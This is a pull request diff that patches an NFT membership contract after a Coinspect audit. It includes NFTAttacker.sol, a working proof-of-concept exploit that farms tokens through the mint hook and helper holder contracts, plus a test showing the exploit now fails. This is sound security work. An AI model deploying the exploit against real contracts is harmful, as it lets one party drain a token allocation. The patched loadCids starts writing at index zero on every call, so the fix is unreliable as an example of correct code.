### PR TITLE
patch: resolve NFT vulnerabilities found by Coinspect

### DIFF
--- a/contracts/EarlyAdopters.sol
+++ b/contracts/EarlyAdopters.sol
@@ -25,8 +25,8 @@ contract EarlyAdopters is
   bytes32 public constant UPGRADER_ROLE = keccak256("UPGRADER_ROLE");
   bytes32 public constant CIDS_LOADER_ROLE = keccak256("CIDS_LOADER_ROLE");
   uint256 private _nextTokenId;
-  mapping(uint256 => string) _ipfsCids;
-  uint256 _totalCids;
+  mapping(uint256 => string) private _ipfsCids;
+  uint256 private _totalCids;
 
   error InvalidCidsAmount(uint256 amount, uint256 maxAmount);
   error OutOfCids();

--- a/contracts/EarlyAdopters.sol
+++ b/contracts/EarlyAdopters.sol
@@ -25,7 +25,8 @@ contract EarlyAdopters is
   bytes32 public constant UPGRADER_ROLE = keccak256("UPGRADER_ROLE");
   bytes32 public constant CIDS_LOADER_ROLE = keccak256("CIDS_LOADER_ROLE");
   uint256 private _nextTokenId;
-  string[] private _ipfsCids;
+  mapping(uint256 => string) _ipfsCids;
+  uint256 _totalCids;
 
   error InvalidCidsAmount(uint256 amount, uint256 maxAmount);
   error OutOfCids();
@@ -59,17 +60,17 @@ contract EarlyAdopters is
 
     string memory uri = _ipfsCids[_nextTokenId];
     uint256 tokenId = _nextTokenId++;
-    _safeMint(msg.sender, tokenId);
+    _safeMint(_msgSender(), tokenId);
     _setTokenURI(tokenId, uri);
   }
 
   /**
    * Burns the token an leaves the community.
-   * `ERC721Burnable` already has a function `burn(uint256)` to burn token by ID. 
+   * `ERC721Burnable` already has a function `burn(uint256)` to burn token by ID.
    * Here it's allowed to own only one token, thus there's no reason for specifying an ID.
    */
   function burn() external virtual {
-    burn(tokenIdByOwner(msg.sender));
+    burn(tokenIdByOwner(_msgSender()));
   }
 
   /**
@@ -90,16 +91,17 @@ contract EarlyAdopters is
     uint256 maxCids = 50;
     uint256 length = ipfsCIDs.length;
     if (length > maxCids) revert InvalidCidsAmount(length, maxCids);
-    for (uint256 i = 0; i < length; i++) _ipfsCids.push(ipfsCIDs[i]);
-    emit CidsLoaded(length, _ipfsCids.length);
+    for (uint256 i = 0; i < length; i++) _ipfsCids[i] = ipfsCIDs[i];
+    _totalCids += length;
+    emit CidsLoaded(length, _totalCids);
   }
 
   /**
    * @dev Returns the number of IPFS CIDs available for minting tokens
    */
   function cidsAvailable() public view virtual returns (uint256) {
-    if (_nextTokenId > _ipfsCids.length) return 0;
-    return _ipfsCids.length - _nextTokenId;
+    if (_nextTokenId > _totalCids) return 0;
+    return _totalCids - _nextTokenId;
   }
 
   /**
@@ -128,6 +130,8 @@ contract EarlyAdopters is
     uint256 tokenId,
     address auth
   ) internal override(ERC721Upgradeable, ERC721EnumerableUpgradeable) returns (address) {
+    // Disallow transfers by smart contracts, as only EOAs can be community members
+    if (_msgSender() != tx.origin) revert ERC721InvalidOwner(_msgSender());
     // allow multiple transfers to zero address to enable burning
     if (to != address(0) && balanceOf(to) > 0) revert ERC721InvalidOwner(to);
     return super._update(to, tokenId, auth);

--- a/contracts/exploit/NFTAttacker.sol
+++ b/contracts/exploit/NFTAttacker.sol
@@ -18,7 +18,7 @@ contract NFTAttacker {
   address[] internal nftHolders;
   address internal owner;
   uint256 public amountOfNftsInControl;
-  uint256 latestNftId;
+  uint256 internal latestNftId;
 
   constructor() {
     owner = msg.sender;

--- a/contracts/exploit/NFTAttacker.sol
+++ b/contracts/exploit/NFTAttacker.sol
@@ -1,0 +1,91 @@
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.20;
+import {IERC721Receiver} from "@openzeppelin/contracts/token/ERC721/IERC721Receiver.sol";
+import {IERC721} from "@openzeppelin/contracts/token/ERC721/IERC721.sol";
+
+interface MinteableNFT {
+  function mint() external;
+}
+
+/**
+ * @title NFTAttacker
+ * @author Coinspect
+ * @notice The smart contract was developed by a third-party security auditor to demonstrate
+ * how to exploit the `RSKD-01` vulnerability in the EarlyAdopters NFT.
+ * The vulnerability and its mitigation are demonstrated in the test file `test/nftAttacker.test.ts`
+ */
+contract NFTAttacker {
+  address[] internal nftHolders;
+  address internal owner;
+  uint256 public amountOfNftsInControl;
+  uint256 latestNftId;
+
+  constructor() {
+    owner = msg.sender;
+  }
+
+  modifier onlyOwner() {
+    require(msg.sender == owner, "not the owner");
+    _;
+  }
+
+  function attack(address _target, uint256 _amountOfNfts) external {
+    while (amountOfNftsInControl != _amountOfNfts) {
+      address newNftHolder = address(new NFTHolder());
+      nftHolders.push(newNftHolder);
+      MinteableNFT(_target).mint(); // this function will call the onERC721Received hook
+      IERC721(_target).safeTransferFrom(address(this), newNftHolder, latestNftId);
+      amountOfNftsInControl += 1;
+    }
+  }
+
+  function transferNFT(address _token, uint256 _tokenId, address _to) external onlyOwner {
+    IERC721(_token).safeTransferFrom(address(this), _to, _tokenId);
+  }
+
+  function moveNFTFromHolder(
+    address _nftHolder,
+    address _token,
+    uint256 _tokenId,
+    address _to
+  ) external onlyOwner {
+    NFTHolder(_nftHolder).transferNFT(_token, _tokenId, _to);
+  }
+
+  function onERC721Received(
+    /* address operator, */
+    /* address from, */
+    uint256 tokenId/* ,
+    bytes calldata data */
+  ) external returns (bytes4) {
+    latestNftId = tokenId;
+    return IERC721Receiver.onERC721Received.selector;
+  }
+}
+
+contract NFTHolder {
+  address internal owner;
+
+  constructor() {
+    owner = msg.sender;
+  }
+
+  modifier onlyOwner() {
+    require(msg.sender == owner, "not the owner");
+
+    _;
+  }
+
+  function transferNFT(address _token, uint256 _tokenId, address _to) external onlyOwner {
+    IERC721(_token).safeTransferFrom(address(this), _to, _tokenId);
+  }
+
+  function onERC721Received(
+    /* address operator,
+    address from,
+    uint256 tokenId,
+    bytes calldata data */
+  ) external pure returns (bytes4) {
+    return IERC721Receiver.onERC721Received.selector;
+  }
+}

--- a/test/EarlyAdopters.test.ts
+++ b/test/EarlyAdopters.test.ts
@@ -10,6 +10,11 @@ async function deploy() {
   return ea as unknown as EarlyAdopters
 }
 
+/**
+ * Adds index number at the end of a string
+ */
+const addIndex = (cid: string, index: number) => cid.slice(0, cid.length - String(index).length) + index
+
 describe('Early Adopters', () => {
   let ea: EarlyAdopters
   let eaAddress: string
@@ -66,8 +71,15 @@ describe('Early Adopters', () => {
     })
 
     it('should load maximum of CIDs into the EA contract', async () => {
-      // URIs will be ipfs://0, ipfs://1...
-      await expect(ea.loadCids([...Array(50).keys()].map(String)))
+      await expect(
+        ea.loadCids(
+          /* 
+      Replace last symbols with array index.
+      URIs will be ipfs://QmQR9mfvZ9fDFJuBne1xnRoeRCeKZdqajYGJJ9MEDchgq0, ipfs://QmQR9mfvZ9fDFJuBne1xnRoeRCeKZdqajYGJJ9MEDchgq1...
+      */
+          [...Array(50).keys()].map(ind => addIndex(cidMock, ind)),
+        ),
+      )
         .to.emit(ea, 'CidsLoaded')
         .withArgs(50, 50)
     })
@@ -109,7 +121,7 @@ describe('Early Adopters', () => {
     })
 
     it('Alice should read her token URI by providing her account address', async () => {
-      expect(await ea.tokenUriByOwner(alice.address)).to.equal(`ipfs://0`)
+      expect(await ea.tokenUriByOwner(alice.address)).to.equal(`ipfs://` + addIndex(cidMock, 0))
     })
   })
 
@@ -137,7 +149,7 @@ describe('Early Adopters', () => {
     })
 
     it('Bob should read his token URI by providing his account address', async () => {
-      expect(await ea.tokenUriByOwner(bob.address)).to.equal(`ipfs://0`)
+      expect(await ea.tokenUriByOwner(bob.address)).to.equal(`ipfs://` + addIndex(cidMock, 0))
     })
 
     it('Deployer should not be able to transfer his ownership to Bob because Bob is already a member', async () => {

--- a/test/nftAttacker.test.ts
+++ b/test/nftAttacker.test.ts
@@ -1,0 +1,40 @@
+import { expect } from 'chai'
+import { ethers, ignition } from 'hardhat'
+import { loadFixture } from '@nomicfoundation/hardhat-toolbox/network-helpers'
+import { EarlyAdopters } from '../typechain-types'
+import EarlyAdoptersModule from '../ignition/modules/EarlyAdoptersModule'
+
+async function deploy() {
+  const { ea } = await ignition.deploy(EarlyAdoptersModule)
+  return ea as unknown as EarlyAdopters
+}
+
+describe('NFT attacker', () => {
+  let ea: EarlyAdopters
+  let eaAddress: string
+  const cidsToLoad = 50 // maximum amount
+  const cidExample = `QmQR9mfvZ9fDFJuBne1xnRoeRCeKZdqajYGJJ9MEDchgqX`
+
+  before(async () => {
+    ea = await loadFixture(deploy)
+    eaAddress = await ea.getAddress()
+  })
+
+  it('should deploy NFT and load CIDs', async () => {
+    await expect(ea.loadCids(Array(cidsToLoad).fill(cidExample)))
+      .to.emit(ea, 'CidsLoaded')
+      .withArgs(cidsToLoad, cidsToLoad)
+
+    expect(await ea.cidsAvailable()).to.equal(cidsToLoad)
+  })
+
+  it('Unable to exploit with Coinspect attacker smart contract', async () => {
+    const nftAttacker = await ethers.deployContract('NFTAttacker')
+    await expect(nftAttacker.attack(eaAddress, cidsToLoad))
+      .to.be.revertedWithCustomError(ea, 'ERC721InvalidOwner')
+      .withArgs(await nftAttacker.getAddress())
+
+    expect(await nftAttacker.amountOfNftsInControl()).to.equal(0)
+    expect(await ea.cidsAvailable()).to.equal(cidsToLoad)
+  })
+})


### PR DESCRIPTION
# What

Resolve Early Adopters NFT smart contract vulnerabilities found by Coinspect:

- Modify Early Adopters NFT smart contract:
  - mitigate `RSKD-01` vulnerability: disallow transfers by smart contracts
  - mitigate `RSKD-02`: store CIDs in a mapping instead of array
  - replace `msg.sender` with the built-in `_msgSender()` - for consistency with OZ contracts
- `NFTAttacker` contract
- Test demonstrating that the `NFTAttacker` smart contract can no longer exploit the vulnerability

# Ref

[DAO-599](https://rsklabs.atlassian.net/browse/DAO-599)